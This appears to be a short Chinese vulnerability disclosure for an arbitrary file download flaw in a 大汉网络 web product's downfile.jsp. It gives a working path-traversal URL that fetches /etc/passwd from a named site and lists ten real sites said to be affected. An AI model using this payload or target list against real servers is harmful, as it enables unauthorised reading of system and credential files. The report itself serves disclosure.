### 简要描述:
大汉网络任意文件下载
### 详细说明:
下载漏洞:
\vc\vc\columncount\downfile.jsp
演示:
http://www.sinoagent.com/vc/vc/columncount/downfile.jsp?savename=a.txt&filename=../../../../../../../../etc/passwd
[<img src="https://images.seebug.org/upload/201501/170002005c8558d853b2ee6aebc2bd0074c221f0.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/170002005c8558d853b2ee6aebc2bd0074c221f0.png)
### 漏洞证明:
案例:
http://qzlx.jsjzi.edu.cn/vc/vc/columncount/downfile.jsp
http://www.cnooc.com.cn/vc/vc/columncount/downfile.jsp
http://cbs.cau.edu.cn/vc/vc/columncount/downfile.jsp
http://www.hebau.edu.cn/vc/vc/columncount/downfile.jsp
http://www.sinotrans.com/vc/vc/columncount/downfile.jsp
http://www.auh.cn/vc/vc/columncount/downfile.jsp
http://www.throad.cn/vc/vc/columncount/downfile.jsp
http://www.sinoagent.com/vc/vc/columncount/downfile.jsp
http://www.green-ccia.com/vc/vc/columncount/downfile.jsp
http://jjjs.acftu.org/vc/vc/columncount/downfile.jsp
京公网安备 11010502034610号
暂无评论